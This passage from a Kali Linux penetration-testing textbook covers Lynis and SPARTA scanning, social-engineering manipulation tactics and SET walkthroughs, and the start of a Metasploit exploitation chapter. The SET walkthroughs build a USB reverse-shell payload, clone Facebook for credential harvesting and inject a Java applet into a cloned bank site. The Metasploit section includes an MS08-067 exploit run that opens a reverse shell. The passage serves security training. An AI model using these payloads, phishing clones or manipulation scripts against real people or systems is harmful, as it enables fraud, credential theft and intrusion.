Lynis is part of the Kali Linux suite, but can also be cloned from GitHub (github.com/CISOfy/lynis) or downloaded directly from the official website (cisofy.com/documentation/lynis/get-started/#installation).

To run Lynis in Kali, you can do so by clicking Applications, then Vulnerability Analysis, then Lynis, or by typing lynis in the terminal. This command shows the installed version of Lynis (in this case, 2.6.2) and initializes the program. Some useful command options are also displayed, as shown in the figure:

You can also type lynis show commands at any time to see available commands in Lynis:

Since Lynis is a fully automated audit assessment tool, there are few commands to use. To audit an entire Kali Linux machine, simply type lynis audit system. The time for this assessment depends on the specifications of the Kali Linux machine running the assessment, but is typically 15 to 30 minutes. The audit displays as follows:

Some of the tests and audits performed on the system include the following:

• Debian tests
• Boot and services
• Kernel
• Memory and processes
• Users, groups, and authentication
• Shells
• File systems
• USB devices
• Networks and firewalls
• Ports and printers
• Kernel hardening

The following screenshot shows a snippet of the Lynis audit results, with 4 warnings and 40 suggestions found:

Scrolling to the end of the audit assessment, we can find a summary of the Lynis audit as follows:

Vulnerability Scanning and Enumeration with SPARTA

SPARTA is a GUI network infrastructure penetration testing tool, written by Antonio Quina and Leonidas Stavliotis of SECFORCE, and is built into Kali Linux. SPARTA automates the scanning, enumeration, and vulnerability assessment process. In addition to its scanning and enumeration capabilities, SPARTA also has built-in brute-force tools for cracking passwords.

The latest version of SPARTA can also be downloaded from GitHub and cloned to the local machine using the command git clone https：//github.com/secforce/sparta.git.

To start SPARTA in Kali Linux 2018, click Applications, then Vulnerability Analysis, and select SPARTA.

In the SPARTA 1.0.3 GUI, click on the left pane to add a host or hosts to scope. This can also be done by clicking File, then Add Host to Scope, as shown:

After adding a host, Nmap host discovery and a staged Nmap scan are run against the target, as these options were selected in the previous screenshot. The following screenshot shows a scan in progress:

Once the Nmap scan is complete, SPARTA provides several tabs in the main window, such as Services, Scripts, Information, Notes, Nikto, and Screenshot tabs, all providing very useful information.

By default, we first see a list of open ports and services under the Services tab, as follows:

Clicking on the Information tab displays collected host information, including IP information; the number of open, closed, and filtered ports (if any); and an accuracy rating for the OS and version:

In this case, the target is a Linux web server, and the Nikto web scanning tool was also run as part of the process. Clicking on the nikto (80/tcp) tab shows a list of discovered vulnerabilities:

Many of the discovered vulnerabilities have an OSVDB prefix, indicating they can be searched for in databases such as Common Vulnerabilities and Exposures (CVE) and Open Source Vulnerability Database (OSVDB). For example, a penetration tester can simply do a Google search for OSVDB-3268 to find more information about the vulnerability SPARTA discovered in the earlier scan. They can then use various tools, such as Metasploit, to exploit this, which will be discussed in later chapters of this book.

Looking at another Windows machine included in the scan (10.10.22.217), clicking on the Services tab reveals several open ports, as shown in the following screenshot:

Since a Windows machine was detected, SPARTA runs the smbenum tool to enumerate the Windows machine, checking for null sessions and performing enumeration tasks, including searching for users and shares, as shown:

SPARTA takes scanning, enumeration, and vulnerability assessment a step further by allowing the penetration tester to perform various network penetration testing functions. From the Services tab, we can right-click on any open port to perform these tasks.

In the following screenshot, right-clicking on open port 3306 presents options to try opening the port using Telnet, Netcat, or MySQL client (as root). There is also an option to Send to Brute to attempt to crack the password via brute force:

Clicking Send to Brute will attempt a brute force attack using the THC Hydra password cracking tool via the selected port. You can also use username and password lists with various options to try empty passwords, try login as password, and so on. After specifying options, click Run to attempt the attack:

These are by no means the only tools available in Sparta. For example, right-clicking on open port 445 on a Windows machine reveals many more options available to the penetration tester, as shown:

Summary

In this chapter, we discussed the process based on some of the tools available in Kali Linux to identify and analyze critical security vulnerabilities. We also mentioned three main categories of vulnerabilities—design, implementation, and operational—and discussed how they fall into two general types of vulnerabilities: local and remote. After that, we discussed several vulnerability taxonomies that security auditors can use to classify security flaws according to their unified commonality pattern. To perform vulnerability assessments, we introduced you to some tools that allow for automated scanning and vulnerability assessment, including Nessus, OpenVAS, Lynis, and SPARTA.

In the next chapter, we will discuss the art of deception and explain various methods of exploiting human weaknesses to gain access to a target. Although this process is sometimes optional, it is considered crucial when there is a lack of information available to allow us to exploit the target infrastructure.

Questions

1. What is the relationship between a vulnerability and an exploit?
2. Which category of vulnerability is considered the most difficult to address?
3. Which website can be used to get information about the latest vulnerabilities?
4. What is the definition of a remote vulnerability?
5. Which tool can perform internal and external PCI DSS scans?
6. Which tool is specifically designed for auditing Linux systems?
7. Which tool is integrated into Sparta for performing website scans?

Further Reading

• Exploit and vulnerability information: www.exploit-db.com/
• Common Vulnerabilities and Exposures database: cve.mitre.org/
• Rapid7 Vulnerability and Exploit Database: www.rapid7.com/db
• Nessus scanning tutorials: docs.tenable.com/nessus/Content/Scans.htm
• OpenVAS community forum: community.greenbone.net/

Chapter 7: Social Engineering

Social engineering is the practice of learning and obtaining valuable information by exploiting human weaknesses. It is considered an art of deception, vital for penetration testers when there is a lack of exploitable target information. Since people are the weakest link in any organization's security defenses, social engineering is the most vulnerable layer in the security infrastructure. We are social animals, and therefore our nature makes us susceptible to social engineering attacks. Social engineers use these attacks to obtain confidential information or gain access to restricted areas. Social engineering employs different forms of attack vectors; each is limited by the individual's imagination, based on the impact and direction of its execution. This chapter will discuss the core principles and practices employed by professional social engineers to manipulate humans into revealing information or performing actions.

In this chapter, we will cover the following topics:

• Basic psychological principles that shape social engineer goals and vision
• General attack process and methodology of social engineering, with practical examples

From a security perspective, social engineering is a powerful weapon used to manipulate people to achieve desired goals. In many organizations, this practice can be assessed to ensure the security integrity of employees and to investigate process and human weaknesses. It is important to note that the practice of social engineering is very common and is employed by a range of individuals, including penetration testers, scammers, identity thieves, business partners, recruiters, salespeople, information brokers, telemarketers, government spies, disgruntled employees, and even children. The distinguishing factor between these different individuals is the motivation of the social engineer executing their strategy against the target.

Technical Requirements

You will need to have the latest version of Kali Linux installed on your system to complete this chapter.

Modeling Human Psychology

Human psychological capabilities depend on the sensory inputs provided. These senses are used to form a perception of reality. This natural phenomenon categorizes human senses into vision, hearing, taste, touch, smell, balance and acceleration, temperature, kinesthesia, pain, and direction. The method of utilizing these senses effectively develops and maintains our perception of the world.

From a social engineering perspective, any information retrieved or extracted from a target through primary senses (visual or auditory), eye movement (eye contact, language contradiction, blink rate, or eye cues), facial expressions (surprise, happiness, fear, sadness, anger, or disgust), and other observed or perceived abstract entities can increase the likelihood of success. Often, social engineers need to communicate directly with the target to obtain confidential information or gain access to restricted areas. This communication can take place physically or by utilizing electronic-assisted technologies.

In the real world, two common strategies are used to accomplish this task: interviewing and interrogation. However, in practice, each strategy includes other factors such as environment, knowledge of the target, and the ability to control the framework of communication. These combined factors (communication, environment, knowledge, and framework control) form the essential skill set of an effective social engineer for conducting social engineering attacks. The entire social engineering activity relies on a trust relationship. If you cannot establish a strong trust relationship with the target, you are likely to fail in your efforts.

Modern social engineering has almost become a science. Be sure to visit the website of the creator of the Social Engineering Framework at www.social-engineer.org/. Christopher Hadnagy, who runs the website and publishes materials on social engineering topics, has done an excellent job making this information available to the public so that we can attempt to train our users and clients on how these attacks occur.

The Attack Process

We propose some essential basic steps to launch a social engineering attack against a target. This is not the only method, nor even the most likely to succeed, but it should give you an idea of what social engineering entails. Intelligence gathering, identifying vulnerable points, planning the attack, and execution are common steps taken by social engineers to successfully disclose and obtain information or access from a target.

• Intelligence gathering: There are many techniques to identify the most attractive targets for penetration testing. This can be done by using advanced search engine tools to gather company email addresses on the web; collecting personal information about staff of the target organization through online social networks; identifying third-party software packages used by the target organization; engaging in company business events and gatherings, and attending conferences; this should provide sufficient intelligence to select the most accurate internal personnel for social engineering purposes.
• Identifying vulnerable points: Once a key internal person is selected, one can proceed to build a trust relationship and appear friendly. This will ensure that any attempt to hijack confidential company information does not harm or alert the target. Maintaining a high degree of stealth and cover throughout the process is important. Alternatively, we can also investigate whether the target organization is using an old version of software that can be exploited via email or web to deliver malicious content, which can then infect the trusted party's computer.
• Planning the attack: You can choose to attack the target directly or passively using electronic-assisted methods. Based on the identified vulnerable entry point, we can easily determine the path and method of the attack. For example, we discovered a friendly customer service representative, Bob, who would unknowingly execute any malicious file without prior authorization from senior management.
• Execution: In the final step, our planned attack should be executed with confidence and patience to monitor and evaluate the results of the target exploitation. At this point, the social engineer should hold enough information or access to the target's property that will allow them to further penetrate the company's assets. After successful execution, the exploitation and acquisition process is complete.

Attack Methods

There are six methods that may help in understanding, identifying, socializing, and preparing a target for the final operation. These methods have been categorized and described according to their unique manifestations in the field of social engineering. We have also included examples to present a real-world scenario where you can apply each of the chosen methods. Remember, psychological factors form the basis of these attack methods; to make these methods more effective, social engineers should frequently train and practice.

Impersonation

The attacker pretends to be someone else to gain trust. For example, to obtain a target's banking information, phishing would be a perfect solution, unless the target doesn't have an email account. Therefore, the attacker first collects or harvests email addresses from the target, and then prepares a fraudulent page that looks exactly like the original bank's web interface.

After completing all necessary tasks, the attacker prepares and sends a formal email (e.g., account details) that looks like it's from the original bank's website, asking the target to visit a link to provide updated banking information to the attacker. By having the skills in web technologies and using a sophisticated set of tools (e.g., SSLstrip), social engineers can easily automate this task effectively. Regarding human-assisted fraud, we can achieve this by appearing in person and impersonating the target's banker identity.

Reciprocity

Exchanging benefits in a reciprocal manner for mutual advantage is called reciprocity. This social engineering involvement may involve a casual and long-term business relationship. By exploiting trust between business entities, one can easily map their targets to obtain any necessary information. For example, Bob, a professional hacker, wants to know the physical security policy of ABC company in their office building. After careful consideration, he decides to develop a website that attracts keen interest from two employees, selling antiques at cheap prices.

Let's assume Bob has learned their personal information, including email addresses, through social networks, internet forums, etc. Among these two employees, Alice starts buying things regularly and becomes Bob's primary target. Bob can now offer a special antique item in exchange for the information he needs. Exploiting the psychological factor in humans, he writes an email to Alice asking her to obtain the physical security policy details of ABC company in return for her receiving the unique antique. She discloses this information to Bob without noticing the business liability. This proves that strengthening relationships through the exchange of values, while creating a fictitious situation, is advantageous to social engineering.

Influential Authority

An attack method in which a person manipulates the business responsibility of a target is called an influential authority attack. This social engineering attack is sometimes part of the impersonation method. Humans naturally and automatically accept instructions from authority or senior management, even if their instincts indicate that certain instructions should not be followed. This makes us vulnerable to certain threats. For example, if someone wants to target XYZ company's network administrator to obtain their credential information, they would observe and record phone numbers of both the administrator and the company CEO via a reciprocal method. Now, using a spoof calling service (e.g., www.spoofcard.com) to call the network administrator, they will note that the call is from the CEO and should be prioritized. This method influences the target to disclose information to a spoofed authority; thus, the target must comply with instructions from senior company management.

Scarcity

Grabbing the best opportunity, especially if it seems scarce, is one of our most greedy instincts. This method describes a way to offer an opportunity for personal gain. The famous Nigerian 419 scam (www.419eater.com) is a classic example of human greed. Let's take an example where Bob wants to collect personal information from students at XYZ university. We assume he already has all the students' email addresses. He then crafts an email offering an iPod discount coupon to all XYZ university students, who are likely to reply with their personal information (name, address, phone, email, date of birth, passport number, etc.).

Since the opportunity is finely tuned to target students, making them believe they can get the latest iPod for free, many of them are likely to fall for it. In the corporate world, this attack method can be scaled to maximize business benefits and achieve business objectives.

Social Relationship

We need some form of social connection to share our ideas, feelings, and thoughts. The most vulnerable part of any social connection is sexuality. In many cases, men and women are attracted to each other. Because of this strong feeling and false sense of trust, we may inadvertently disclose information. There are several online social portals where people can meet and chat. These include Facebook, MySpace, Twitter, and Orkut. For example, Bob is hired by XYZ company to obtain financial and marketing strategies of ABC company for sustainable competitive advantage. He looks through many employees and finds a girl named Alice who handles all business operations. Posing as a regular business school graduate, he tries to build a relationship with her (e.g., via Facebook). Bob deliberately creates some situations where he can meet Alice, such as social gatherings including anniversaries, ballrooms, and musical festivals. Once he has gained a certain level of trust, he can arrange to meet Alice regularly. This practice allows him to extract useful insights into ABC's financial and marketing perspectives. Remember, the more effective and trustworthy the relationship you build, the more you can socially engineer your target. There are tools that will make this task easier for you, such as SET, which we will describe in the next section.

Curiosity

There is an old saying: curiosity killed the cat. This is a caution to humans that sometimes our own curiosity gets the better of us. At work, curiosity plays a large role. We want to know how much the CEO makes, who will get promoted, and who will be fired. Therefore, social engineers use this natural curiosity against us. We may be enticed to click a link in an email that offers a preview of some celebrity gossip. We may also be enticed to open a document that is actually malware, thus compromising our system. Penetration testers can exploit this curiosity in many different ways.

The Social Engineering Toolkit

The Social Engineering Toolkit (SET) is an advanced, multi-function, and easy-to-use computer-aided social engineering toolkit created by the founder of TrustedSec (www.trustedsec.com/). It helps you prepare the most effective methods for exploiting client-side application vulnerabilities and attempting to capture confidential information from the target (e.g., email passwords). Some of the most effective and useful attack methods used by SET include targeted phishing emails with malicious file attachments, Java applet attacks, browser-based exploits, collecting website credentials, creating infectious portable media (USB/DVD/CD), mass mailer attacks, and other similar multi-attack vector networks. The combination of these attack methods provides a powerful platform for leveraging and selecting the most convincing techniques to launch advanced attacks against the human element.

To start SET, navigate to Applications | Penetration Tools | Social Engineering Toolkit. You can also load SET using the terminal:

root@kali:~# setoolkit

This will execute SET and display the following options:

In our test exercise, we will exploit the target's curiosity to open a reverse shell on the target system. To achieve this, we will use SET to craft an executable and place it on a USB device. Then, we will leave this USB device somewhere in the organization to see if someone picks it up and inserts it.

Do not use the update capabilities of the packages within Kali Linux. Instead, update Kali frequently so that recent updates to your applications are supported.

Anonymous USB Attack

During this attack, we will craft an executable that will establish a reverse connection between the target computer and our testing computer. To deliver this executable, we will place it on a USB device with a name that will pique the target's curiosity. Once the USB is configured, leaving it in a public area of the target organization should yield the results we need.

For more information, visit www.social-engineer.org/framework/general-discussion/.

The steps to perform our USB attack are as follows:

1. From the main options list, we select 1) Social-Engineering Attacks:

2. To craft the executable we will use, select 3) Infectious Media Generator:

3. The Infectious Media Generator will prompt for the type of exploit to use. For our purposes, we will use the Metasploit executable. Select 2) Standard Metasploit Executable:

4. There are many different payloads available. For example, in a corporate environment, a Windows Meterpreter Reverse HTTPS payload would be very useful, as organizations often allow full HTTPS connectivity to the public internet. For our purposes, we will use a simple reverse TCP connection. Enter the payload for a reverse TCP shell, in this case 2) Windows reverse TCP Meterpreter:

5. We need to set the payload listener address, which in this case is the IP address of our testing machine (172.16.122.185). In some cases, you can have a central server with Kali Linux and use multiple USBs for this attack, all pointing back to the payload listener address. Set the reverse listener port to 4444 and press Enter. You will be prompted to create a listener. If you are testing, enter yes, which will start the Meterpreter listener:

6. Navigate to /root/.set, and you will see the executable listed:

7. Simply copy the payload.exe file to the desktop, and you can then load it onto a USB device. Another trick is to change the name of the executable to something that can exploit the target's curiosity, such as Execute Bonus. This is useful if the autorun feature on USB ports is disabled. Now that you have loaded the USB, leave it in a public area or even the parking lot of the target enterprise.

8. Our unsuspecting victim picks up the USB device and inserts it. At this point, the executable runs, and we see a Meterpreter shell open on our testing machine:

Only use this attack if it is within your rules of engagement and your client is aware of what you are going to do. This attack also requires access to the physical location. There are also variants where you send the payload file via email or other messaging services.

SET is constantly updated by its creator, so significant changes may occur at any time. We have only scratched the surface of this tool's capabilities. It is highly recommended that you continue to learn about this powerful Social Engineering Toolkit by visiting www.trustedsec.com/downloads/social-engineer-toolkit/; start by watching the videos presented on the site.

Credential Harvesting

In this attack, we will set up a fake website of a known site. However, our copy will allow us to capture the credentials the user uses. To get the user to visit our site, you need to deliver it via email, with a header or subject line that arouses the user's interest in accessing the site. They will be prompted to log in, and just like that, credentials will be captured:

1. Enter setoolkit, and from the main menu, select option 1 to enter the Social Engineering menu.
2. At the prompt, enter 2 to select Website Attack Vectors:

3. Enter 3 to select Credential Harvester Attack Method:

At this point, you have successfully loaded the Credential Harvester Attack Method module. Within this module, we have 3 options: we can use Web Templates, Site Cloner, or Custom Import. For our case, we select 2) Site Cloner:

The first parameter we need to provide is the IP address where the site will be hosted, which is the address of the host you are currently on. You can confirm your IP by entering ifconfig in another terminal, but the module should automatically populate it in the prompt:

Currently, my IP is 172.20.1.85. Your IP address will differ. Once you enter it, the next step is to enter the site you want to clone. Here, I entered www.facebook.com:

Cloning the site takes some time, but once complete, you will receive a message asking if you know the web server's directory structure. On Kali, the default structure is /var/www/. Press Enter, and the web server will start.

I tested it on KALI's browser to confirm it works by visiting 127.0.0.1 and my network IP, 172.20.1.85, and confirmed it loaded, as shown below:

As can be seen from the screenshot, SET reported the two tests I performed to confirm the site was accessible.

At this point, we have successfully established our engagement platform, from which we will generate a fake email with a link pointing to our system and send it to our target. The results of prior reconnaissance will be your primary source, you need to know who the email should appear to come from, who should receive it, and the wording of the email needs to be done in a similar way to how they write, including the signature.

Many managers reply to emails on their phones, and often the phone signature is quite different from their laptop signature. For example, a manager's typical signature might be his full name John Winter, while replying on a phone might use --J. This is something you should pay attention to.

Instead of targeting a few users via email, we could target all users on our network. This would involve some additional steps and some additional tools. We will return to this in Chapter 11, Wireless Penetration Testing.

Malicious Java Applet

In this attack, we will use a setup similar to the credential harvesting attack, this time embedding a custom Java Applet into the page, prompting the user to give permission to execute. Once the user accepts the prompt, the payload executes and connects back to our machine, providing remote access:

1. Launch the Social Engineer Toolkit again, type 1 to select Social Engineering Menus, then type 2 to select Website Attack Vectors.
2. From the menu, type 1 to select Java Applet Attack Method:

3. Once loaded, we will use the site cloning option from the previous example:

4. You will be asked if you want to use port forwarding or NAT enabled. For this example, I will type no, since this is being set up in an internal environment.
5. Set the listener IP address. By default, SET will detect your IP and fill it in automatically. Simply press Enter.
6. You will be prompted to set up the Java Applet itself using one of three options. For this example, we will use the built-in option that comes with SET. If you know how to code in Java, feel free to use option three to enter your own custom code:

7. SET will continue generating the applet. You will be prompted to enter the target site to clone. You will want to choose a site where the victim will be less hesitant to let the Java applet run on our request. In this case, I chose www.chase.com. After cloning, SET will also automatically inject the Java Applet:

8. Inject the payload into the applet. For this example, we will use option three:

9. The last option to set is the listening port, I left it at the default 443:

The setup is now complete. Similar to the Credential Harvester, we can forward the link to our victim via email, ensuring that the wording in the email does not arouse the victim's suspicion, but instead makes them feel they need to click the link.

Summary

In this chapter, we discussed the common uses of social engineering in all walks of life. A penetration tester may encounter situations where applying social engineering strategies is necessary to obtain sensitive information from a target. Human nature is susceptible to specific deception techniques. To better understand social engineering skills, we presented a set of basic elements (communication, environment, knowledge, and framework control), which construct a human psychology model. These psychological principles, in turn, help social engineers adapt and extract the attack process (intelligence gathering, identifying vulnerable points, planning the attack, and execution) and methods (impersonation, reciprocity, influential authority, scarcity, and social relationships) according to the target being reviewed. Then, we explained the use of SET to enhance and automate social engineering attacks on the internet.

In the next chapter, we will discuss the process of exploiting targets using multiple tools and techniques, significantly conducting vulnerability research, and skillfully obtaining your target.

Chapter 8: Target Exploitation

Target exploitation is the area that distinguishes penetration testing from vulnerability assessment. Now that vulnerabilities have been discovered, you will verify and exploit these vulnerabilities by exploiting the system, hoping to gain complete control over the target network and systems within it, or additional information and visibility. This chapter will focus on and discuss the practices and tools used for real-world exploitation.

In this chapter, we will cover the following topics:

• In the Vulnerability Research section, we will explain which areas of vulnerability research are crucial for understanding, examining, and testing vulnerabilities before translating them into actual exploit code.
• We will point you to several exploit libraries that should give you an idea of publicly available exploits and when to use them.
• We will illustrate how to use a notorious exploit toolkit from a target assessment perspective. This will give you a clear idea of how to exploit a target to gain sensitive information. The Advanced Exploitation Toolkit section includes some hands-on exercises.
• Finally, we will attempt to briefly describe the steps to write a simple exploit module for Metasploit.

Writing exploit code from scratch can be a time-consuming and expensive task. Therefore, using publicly available exploits and adapting them to your target environment may require expertise, which will help you convert the skeleton of one exploit into another if the similarity and purpose are almost identical. We strongly encourage practicing with publicly available exploits in your own lab to further understand and start writing your own exploit code.

Vulnerability Research

Understanding the capabilities of a specific software or hardware product may provide a starting point for investigating potential vulnerabilities in that product. Conducting vulnerability research is not easy, nor is it a one-click task. Therefore, it requires a strong knowledge base and different factors for security analysis:

• Programming skills: This is a fundamental factor for ethical hackers. Learning the basic concepts and structures present in any programming language should give the tester an advantage when discovering vulnerabilities. In addition to a basic understanding of programming languages, you must be prepared to handle advanced concepts of processors, system memory, buffers, pointers, data types, registers, and caches. These concepts can be implemented in almost any programming language, such as C/C++, Python, Perl, and Assembly.

To learn the basics of writing exploit code from discovered vulnerabilities, visit www.phreedom.org/presentations/exploit-code-development/exploit-code-development.pdf.

• Reverse engineering: This is another broad area for discovering potential vulnerabilities in electronic devices, software, or systems, by analyzing their functionality, structure, and operation. Its purpose is to derive code from a given system without any prior knowledge of its internal workings; to check its error conditions, poorly designed features, and protocols; and to test boundary conditions. There are several reasons to use reverse engineering skills, such as removing copy protection from software, security auditing, competitive technical intelligence, identifying patent infringements, interoperability, understanding product workflows, and obtaining sensitive data. Reverse engineering adds two conceptual layers to reviewing an application's code: source code auditing and binary auditing. If you have access to the application's source code, you can complete security analysis through automated tools; or manually study the source code to extract conditions where vulnerabilities might be triggered. On the other hand, binary auditing simplifies the reverse engineering task for applications without any source code. Disassemblers and decompilers are two ganeral types of tools that may assist auditors in binary analysis. Disassemblers generate assembly code from compiled binary programs, while decompilers generate high-level language code from compiled binary programs. However, using either of these tools is very challenging and requires careful evaluation.
• Instrumentation tools: Instrumentation tools, such as debuggers, data extractors, fuzzers, performance profilers, code coverage, flow analyzers, and memory monitors, play a significant role in the process of vulnerability discovery and provide a consistent environment for testing purposes. Explaining each tool category is beyond the scope of this book. However, you will likely find several useful tools already present in Kali Linux. To keep track of the latest reverse code engineering tools, we strongly recommend you visit the online library at www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools.
• Exploitability and payload construction: This is the final step of writing Proof of Concept (PoC) code for a vulnerable element of an application, which can allow a penetration tester to execute custom commands on the target machine. We apply our knowledge of the vulnerable application from the reverse engineering phase to polish the shellcode with encoding mechanisms to avoid bad characters that could cause the exploitation process to terminate.

Depending on the type and classification of the discovered vulnerability, it is very important to follow a specific strategy, which may allow you to execute arbitrary code or commands on the target system. As a professional penetration tester, you will always be looking for vulnerabilities that may lead to gaining shell access to the target operating system. Therefore, we will demonstrate some scenarios using the Metasploit framework later in this chapter, showcasing these tools and techniques.

Vulnerability and Exploit Libraries

Over the years, many vulnerabilities have been reported in the public domain. Some of them have been disclosed with PoC exploit code to prove the feasibility and viability of the vulnerability found in a specific software or application. Many remain unaddressed. In this competitive era, having access to publicly available exploits and vulnerability information allows penetration testers to quickly search and retrieve the best exploit to suit their target system environment. You can also port one type of exploit to another (e.g., from Win32 architecture to Linux architecture), provided you have intermediate programming skills and a clear understanding of the specific operating system architecture. We provide a set of online repositories that can help you track any vulnerability information or its exploit by searching.

Not all discovered vulnerabilities have been disclosed to the public on the internet. Some are reported but without any PoC exploit code, and some do not even provide detailed vulnerability information. Therefore, consulting multiple online resources is a common practice among many security auditors.

The following is a list of online repositories:

Repository Name	Website URL
Bugtraq SecurityFocus	www.securityfocus.com
OSVDB Packet Storm Vulnerabilities	blog.osvdb.org/
Packet Storm	www.packetstormsecurity.org
National Vulnerability Database	nvd.nist.gov
IBM ISS X-Force	exchange.xforce.ibmcloud.com/
US CERT Vulnerability Notes	www.kb.cert.org/vuls
US CERT Alerts	www.us-cert.gov/cas/techalerts/
SecuriTeam	www.securiteam.com
Secunia Advisories	secunia.com/advisories/historic/
CXSecurity.com	cxsecurity.com
XSSed XSS-Vulnerability	www.xssed.com
Security Vulnerabilities Database	securityvulns.com
SEBUG	www.sebug.net
MediaService Lab	techblog.mediaservice.net
Intelligent Exploit Aggregation Network	www.intelligentexploit.com

Although many other internet resources are available, we have listed only a few vetted ones. Kali Linux integrates Offensive Security's Exploit Database. This provides the added advantage of keeping all archived exploits on the system for future reference and use. To access Exploit-DB, execute the following commands on the shell:

# cd /usr/share/exploitdb/
# vim files.csv 

This will open the complete list of currently available Exploit-DB exploits under the /usr/share/exploitdb/platforms/ directory. These exploits are categorized in their associated subdirectories by system type (Windows, Linux, HP-UX, Novell, Solaris, BSD, IRIX, TRU64, ASP, PHP, etc.). Most of these exploits are developed using C, Perl, Python, Ruby, PHP, and other programming techniques. Kali Linux is already equipped with some compilers and interpreters that support the execution of these exploits.

How can we extract specific information from the exploit list?

Leveraging the power of Bash commands, you can manipulate the output of any text file to retrieve meaningful data. You can use Searchsploit, or type cat files.csv |cut -d"," -f3 on the console. This will extract a list of exploit titles from the files.csv file. To learn basic shell commands, refer to tldp.org/LDP/abs/html/index.html.

Advanced Exploitation Toolkit

Kali Linux comes preloaded with some of the best and most advanced exploitation toolkits. The Metasploit Framework (www.metasploit.com) is one of them. Here, we explain it in detail and present some scenarios that will increase its productivity and enhance your experience with penetration testing. The framework is developed in the Ruby programming language and supports modularity, making it easier for penetration testers to extend or develop custom plugins and tools. The architecture of the framework is divided into three broad categories: Libraries, Interfaces, and Modules. Our focus will be on the functionality of various interfaces and modules. Interfaces (Console, CLI, Web, and GUI) basically provide front-end operational activities, handling any type of module (Exploit, Payload, Auxiliary, Encoder, and NOP). Each of the following modules has its own meaning and specific function for the penetration testing process:

• Exploit: This module is PoC code developed to exploit a specific vulnerability in the target system.
• Payload: This module is malicious code, either part of an exploit or compiled independently, used to execute arbitrary commands on the target system.
• Auxiliary: These modules are a set of tools used for performing scanning, sniffing, dialing, fingerprinting, and other security assessment tasks.
• Encoder: These modules are used to encode the payload during a penetration operation to evade detection by antivirus software, firewalls, IDS/IPS, and other similar malware defenses.
• No Operation or No OPeration (NOP): This module is an assembly language instruction, typically added to shellcode, that does nothing, simply to cover consistent payload space.

To give you an idea, we will explain the basic usage of two well-known Metasploit interfaces and their associated command-line options. Each interface has its own strengths and weaknesses. However, we strongly recommend sticking with the console version, as it supports most of the framework's features.

MSFConsole

MSFConsole is one of the most effective, powerful, and all-in-one front-end interfaces for penetration testers to fully exploit the exploitation framework. To access msfconsole, go to Applications | Exploitation Tools | Metasploit, or use the terminal to execute the following command:

# msfconsole 

You will enter an interactive console interface. To see all available commands, you can enter the following command:

msf> help 

This will display two sets of commands; one set will be widely used throughout the framework, and the other will be specific to the database backend for storing assessment parameters and results. Instructions on other usage options can be obtained by using -h after a core commend. Let's look at the usage of the show command:

msf> show -h
[*] Valid parameters for the "show" command are: all, encoders, 

nops, exploits, payloads, auxiliary, plugins, options [*] Additional module-specific parameters are: advanced, evasion, targets, actions

This command is typically used to display available modules of a given type, or all modules. The most commonly used commands are probably the following:

• show auxiliary: This command will display all auxiliary modules.
• show exploits: This command will fetch the list of all exploits within the framework.
• show payloads: This command will retrieve the list of payloads for all platforms. However, using the same command in the context of a selected exploit will only show compatible payloads. For example, Windows payloads will only be displayed with Windows-compatible exploits.
• show encoders: This command will print the list of available encoders.
• show nops: This command will display all available NOP generators.
• show options: This command will display the settings and options for a specific module.
• show targets: This command will help us extract the list of target operating systems supported by a specific exploit module.
• show advanced: This command will give you more options to fine-tune your exploit execution.

We have compiled a short list of the most valuable commands in the following table; you can practice each one using the Metasploit console. The italicized terms next to the commands will require your input:

Command	Description
check	Verifies a specific exploit against your vulnerable target without exploiting it. This command is not supported by many exploits.
connect ip port	Similar to Netcat and Telnet tools.
exploit	Launches the selected exploit.
run	Launches the selected auxiliary.
jobs	Lists all currently running background modules and provides the ability to kill them.
route add subnet netmask session id	Adds a route for network pivoting purposes through a compromised session.
info module	Displays detailed information about a specific module (exploit, auxiliary, etc.).
set param value	Configures a parameter value within the current module.
setg param value	Sets a parameter value globally in the framework for use by all exploit and auxiliary modules.
unset param	It is the reverse of the set command. You can also reset all variables at once using the unset all command.
unsetg param	Unsets one or more global variables.
sessions	Allows displaying, interacting with, and terminating target sessions. Use -l to list, -i ID to interact, -k ID to kill.
search string	Provides search functionality through module names and descriptions.
use module	Selects a specific module in the penetration testing environment.

We will demonstrate practical usage of some of these commands in the following sections. It is important to understand their basic usage across different module sets within the framework.

MSFCLI

Like the MSFConsole interface, the CLI provides extensive coverage of various modules that can be launched in any single instance. However, it lacks some of the advanced automation features of MSFConsole.

To access msfcli, use the terminal to execute the following command:

# msfcli -x 

This will display all available modes, similar to MSFConsole, and provide usage instructions for selecting a specific module and setting its parameters. Note that all variables or parameters should follow the param=value convention, and all options are case-sensitive. We provide a small exercise to select and execute a specific exploit:

# msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, 

SRVSVC)

Using O at the end of the preceding command instructs the framework to display the available options for the selected exploit. The following command sets the target IP using the RHOST parameter:

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 P
[*] Please wait while we load the module tree...

Compatible payloads
===================

   Name                             Description
   ----                             -----------
generic/debug_trap               Generate a debug trap in the target process
generic/shell_bind_tcp           Listen for a connection and spawn a command shell
... 

Finally, after setting the target IP with the RHOST parameter, it is time to select a compatible payload and execute our exploit:

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 LHOST=192.168.0.3 PAYLOAD=windows/shell/reverse_tcp E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.0.3:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.0.7
[*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1027)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32> 

As you can see, we have obtained a local shell access to the target machine after setting the LHOST parameter for the selected payload.

Ninja 101 Training

The examples provided in this section will clarify your understanding of the various ways to use the exploitation framework. It is impossible to cover every aspect, or to use the Metasploit framework, but we have carefully researched and extracted the most important features for you to practice. To gain in-depth knowledge of the Metasploit framework, we highly recommend reading the online tutorial Metasploit Unleashed at www.offensive-security.com/metasploit-unleashed/. This tutorial contains advanced material from a penetration testing perspective, including insights into exploit development, vulnerability research, and assessment techniques.

Scenario 1

In this exercise, we will demonstrate how to use the Metasploit framework for port scanning, OS fingerprinting, and service identification using the integrated Nmap tool. On MSFConsole, execute the following commands:

msf> load db_tracker
[*] Successfully loaded plugin: db_tracker 

